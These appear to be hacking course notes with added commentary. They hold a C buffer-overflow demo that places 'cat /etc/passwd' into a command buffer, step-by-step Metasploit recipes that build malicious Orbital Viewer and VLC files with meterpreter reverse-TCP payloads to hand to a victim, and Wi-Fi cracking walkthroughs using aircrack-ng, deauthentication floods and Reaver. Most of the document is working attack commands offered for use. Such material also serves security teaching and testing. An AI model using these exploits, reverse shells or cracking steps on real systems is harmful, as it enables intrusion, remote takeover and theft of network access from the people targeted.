[ The first part is padding : as many characters as the printed difference between the two addresses, so "cat /etc/passwd" lands at the start of command and system() executes it. gets() is the intentional bug here; a bounded read such as fgets(name, 10, stdin) stops the overflow. ]
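
The overflow in buffer.c depends on malloc() happening to place the two chunks next to each other, so it is worth rebuilding deterministically. The block below is an added example, not code from the notes: it puts the same two buffers in one struct (so adjacency is guaranteed), copies the input once the way gets() does and once with a bounded copy, and builds the padded input from the offset difference instead of from printed addresses. It never calls system(); it only shows what ends up in command. The struct and function names are this example's own.

```c
/* Added example (not from the notes): the buffer.c overflow with a fixed
 * layout, the vulnerable copy beside a bounded one.  No command is run. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16
#define CMD_LEN  128

/* Same two buffers as buffer.c, but in one struct so that 'command' is
 * guaranteed to sit right after 'name' (malloc() only happened to do that). */
struct greeter {
    char name[NAME_LEN];
    char command[CMD_LEN];
};

/* Vulnerable copy: like gets(name), it stops only at the NUL, so a long
 * input runs past 'name' straight into 'command'.  Written as a byte loop
 * over the whole struct so a fortified strcpy/memcpy cannot mask the bug. */
void fill_name_vulnerable(struct greeter *g, const char *input)
{
    char *dst = (char *)g + offsetof(struct greeter, name);
    while (*input)
        *dst++ = *input++;
    *dst = '\0';
}

/* Hardened copy: bounded by the destination size, always NUL terminated,
 * and reports truncation (1) instead of silently writing past the array. */
int fill_name_safe(struct greeter *g, const char *input)
{
    size_t n = strlen(input);
    int truncated = n >= NAME_LEN;
    if (truncated)
        n = NAME_LEN - 1;
    memcpy(g->name, input, n);
    g->name[n] = '\0';
    return truncated;
}

/* Builds the input the notes describe: 'diff' bytes of padding to reach
 * the second buffer, then the command, so 'cmd' lands exactly at
 * 'command'.  Returns the input length, or 0 if 'out' is too small. */
size_t build_attack_input(size_t diff, const char *cmd, char *out, size_t outlen)
{
    size_t cmdlen = strlen(cmd);
    if (diff + cmdlen + 1 > outlen)
        return 0;
    memset(out, 'A', diff);
    memcpy(out + diff, cmd, cmdlen + 1);
    return diff + cmdlen;
}

/* Sets the command the program meant to run, copies 'input' into name with
 * the chosen routine and returns what 'command' holds afterwards. */
const char *command_after(struct greeter *g, const char *input, int use_safe)
{
    strcpy(g->command, "echo safe");
    if (use_safe)
        fill_name_safe(g, input);
    else
        fill_name_vulnerable(g, input);
    return g->command;
}

/* Returns 1 if the constructed attack input ends up in 'command' with the
 * chosen copy routine, 0 if the original command survived, -1 on error. */
int attack_reaches_command(int use_safe)
{
    struct greeter g;
    char input[256];
    size_t diff = offsetof(struct greeter, command) - offsetof(struct greeter, name);
    if (build_attack_input(diff, "cat /etc/passwd", input, sizeof input) == 0)
        return -1;
    return strcmp(command_after(&g, input, use_safe), "cat /etc/passwd") == 0;
}

int main(void)
{
    struct greeter g;
    char input[256];
    size_t diff = offsetof(struct greeter, command) - offsetof(struct greeter, name);

    build_attack_input(diff, "cat /etc/passwd", input, sizeof input);
    printf("difference between buffers : %zu\n", diff);
    printf("vulnerable copy -> command = \"%s\"\n", command_after(&g, input, 0));
    printf("bounded copy    -> command = \"%s\"\n", command_after(&g, input, 1));
    return 0;
}
```

Compile with gcc and run: the vulnerable copy reports command = "cat /etc/passwd" while the bounded copy leaves "echo safe" and reports truncation. The fix to carry back into buffer.c is the same one: replace gets(name) with fgets(name, 10, stdin), and never let the input length decide how far a write goes.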

1] Buffer Overflow Attack On Orbital Viewer

msfconsole

search bof

search orbital

use exploit/windows/fileformat/orbital_viewer_orb

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST <Our IP>

exploit [ writes the malicious file to ~/.msf4/local/msf.orb ]

exit

Note : Give " msf.orb " to the victim; now start the handler :

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST < Our IP >

set LPORT 4444 ---------> because the payload was built with the default LPORT, 4444

exploit

meterpreter >

II. Buffer Overflow In VLC Player

use exploit/windows/fileformat/vlc_modplug_s3m

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST <Our IP>

exploit [ writes the malicious file to ~/.msf4/local/msf.s3m ]

exit

Note : Give " msf.s3m " to the victim; now start the handler :

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST < Our IP >

set LPORT 4444 ---------> because the payload was built with the default LPORT, 4444

exploit

meterpreter >

Wi-Fi Hacking

http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

1. WEP / WPA / WPA-2

WEP - Wired Equivalent Privacy

WEP keys are a sequence of hexadecimal digits.

These digits include the numbers 0-9 and the letters A-F.

Some examples of WEP keys are:

1A648C9FE2

99D767BAC38EA23B0C0176D152

The length of a WEP key depends on the type of WEP security (called "encryption") used; the advertised size counts the 24-bit IV, so the secret part is 24 bits shorter :

40- or 64-bit WEP: 10 digit key ( 5 bytes )

104- or 128-bit WEP: 26 digit key ( 13 bytes )

232- or 256-bit WEP: 58 digit key ( 29 bytes )

WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key

The pre-shared key used by WPA is 256-bit, a significant increase over the 40- and 104-bit keys used in the WEP system. It is derived from the passphrase and the SSID ( PBKDF2-HMAC-SHA1, 4096 rounds ), which is why the wordlist attack in the next part works : guess a passphrase, derive the key, check it against the captured handshake.

Temporal Key Integrity Protocol - TKIP

TKIP employs a per-packet key mixing scheme that is considerably more secure than the fixed key used in the WEP system.

TKIP was later superseded by AES-based CCMP (Advanced Encryption Standard).

WPA2 - Wi-Fi Protected Access II

AES-CCMP encryption; the 256-bit pre-shared key is given either as 64 hexadecimal digits or derived from a passphrase of 8 to 63 ASCII characters.
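
As an added example (not from the notes), the block below is a small C parser for the key formats listed above, the kind of check you want before handing a key to aircrack-ng or a wireless config: it accepts plain hex, the colon-separated hex that aircrack-ng prints when it recovers a key ("1A:64:8C:9F:E2"), and 5/13/29-character ASCII keys, maps each to its WEP flavour and rejects anything of an invalid length or with non-hex characters. The WEP sizes it hard-codes are the ones above; the function names are this example's own.

```c
/* Added example (not from the notes): parse and validate WEP key strings.
 * Hex keys have 10, 26 or 58 hex digits (5, 13 or 29 key bytes; the
 * "64/128/256-bit" names count the 24-bit IV); ASCII keys have 5, 13 or
 * 29 characters used byte-for-byte; aircrack-ng prints keys with colons. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define WEP_MAX_KEY_BYTES 29   /* 58 hex digits */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Maps a key byte count to the WEP flavour name, or -1 if it is none. */
static int wep_bits_for_bytes(size_t nbytes)
{
    switch (nbytes) {
    case 5:  return 64;
    case 13: return 128;
    case 29: return 256;
    default: return -1;
    }
}

/* Decodes a WEP key into 'out'.  Accepts plain hex, colon-separated hex
 * and ASCII keys.  Returns the number of key bytes written, or -1 when the
 * string is not a key of any valid WEP length. */
int parse_wep_key(const char *s, unsigned char *out, size_t outlen)
{
    char digits[2 * WEP_MAX_KEY_BYTES + 1];
    size_t ndig = 0, len = strlen(s);
    int all_hex = 1, had_colon = 0;

    /* Pass 1: drop ':' separators and note whether every char is hex. */
    for (size_t i = 0; i < len; i++) {
        if (s[i] == ':') { had_colon = 1; continue; }
        if (hexval((unsigned char)s[i]) < 0) all_hex = 0;
        if (ndig < sizeof digits - 1) digits[ndig] = s[i];
        ndig++;
    }
    if (ndig > sizeof digits - 1) return -1;   /* longer than any WEP key */

    /* Hex form: even digit count, all hex, and a valid byte length. */
    if (all_hex && ndig % 2 == 0 && wep_bits_for_bytes(ndig / 2) > 0) {
        size_t nbytes = ndig / 2;
        if (nbytes > outlen) return -1;
        for (size_t i = 0; i < nbytes; i++)
            out[i] = (unsigned char)((hexval(digits[2 * i]) << 4) | hexval(digits[2 * i + 1]));
        return (int)nbytes;
    }
    /* ASCII form: only when no separators were used and the length fits. */
    if (!had_colon && wep_bits_for_bytes(len) > 0) {
        if (len > outlen) return -1;
        memcpy(out, s, len);
        return (int)len;
    }
    return -1;
}

/* Returns 64, 128 or 256 for a valid key string, -1 otherwise. */
int wep_key_bits(const char *s)
{
    unsigned char key[WEP_MAX_KEY_BYTES];
    int n = parse_wep_key(s, key, sizeof key);
    return n < 0 ? -1 : wep_bits_for_bytes((size_t)n);
}

/* Returns decoded key byte 'i' (0..255), or -1 if the key or index is bad. */
int wep_key_byte(const char *s, size_t i)
{
    unsigned char key[WEP_MAX_KEY_BYTES];
    int n = parse_wep_key(s, key, sizeof key);
    return (n < 0 || i >= (size_t)n) ? -1 : key[i];
}

int main(void)
{
    const char *samples[] = { "1A648C9FE2", "99D767BAC38EA23B0C0176D152",
                              "1A:64:8C:9F:E2", "password12345", "1A648C9FEZ" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s -> %d-bit WEP\n", samples[i], wep_key_bits(samples[i]));
    return 0;
}
```

The two notes' keys decode to 64- and 128-bit WEP; the colon form aircrack-ng prints decodes to the same bytes as the plain hex, and a string with a non-hex character or an odd length that is not an ASCII length is rejected rather than silently truncated.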

2. Command Line

airmon-ng -> To put your network adapter in monitor mode.

airodump-ng -> Start monitoring and packet sniffing.

aireplay-ng -> To inject packets, eg: deauthenticate a client or replay ARP requests.

aircrack-ng -> To crack the key.

SSID - service set identifier (Name of Network)

BSSID - Basic Service Set Identifier -> the AP's MAC address; it identifies the access point and the clients associated with it

Hacking WEP From BackTrack Linux Terminal

step1 : airmon-ng start wlan0

step2 : airodump-ng mon0

step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000 IVs ( the #Data column; some keys need tens of thousands )

step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0

For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --ignore-negative-one

[ Note : a deauth only disconnects clients, it does not create new IVs. To gather IVs faster on a quiet network use fake authentication followed by ARP request replay : aireplay-ng -1 0 -a <BSSID> mon0 , then aireplay-ng -3 -b <BSSID> mon0 ]

step5 : aircrack-ng lab-01.cap [ airodump-ng numbers its output files, so "-w lab" writes lab-01.cap ]

Hacking WPA & WPA2 From BackTrack Linux Terminal

step1 : airmon-ng start wlan0

step2 : airodump-ng mon0

step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0

step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0 [ the deauth forces the client to reconnect, which replays the 4-way handshake ]

> wait for at least one 4-way handshake ( airodump-ng shows "WPA handshake: <BSSID>" in its top line )

> For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --ignore-negative-one

step5 : aircrack-ng -w wordlist lab-01.cap

Hacking WPS From BackTrack Linux Terminal

Reaver : [ brute-forces the WPS PIN and recovers the WPA/WPA2 passphrase from it; it does not touch WEP ]

wash -i mon0

[ to see if WPS is enabled on the target ( it should be ) and the " WPS Locked " column shows " No " ]

reaver -i mon0 -b <BSSID> -S --no-nacks -d 7 -vv -c 1

NOTE : If you already have the PIN :

reaver -i mon0 ( or the interface airoscript created if you use a fake MAC ) -b <BSSID> -vv -c <channel> -e <name of AP> -p <wps pin>

Graphical Interface Tools For Wi-Fi Hacking

wifite

Gerix Wi-Fi Cracker

Fern Wi-Fi Cracker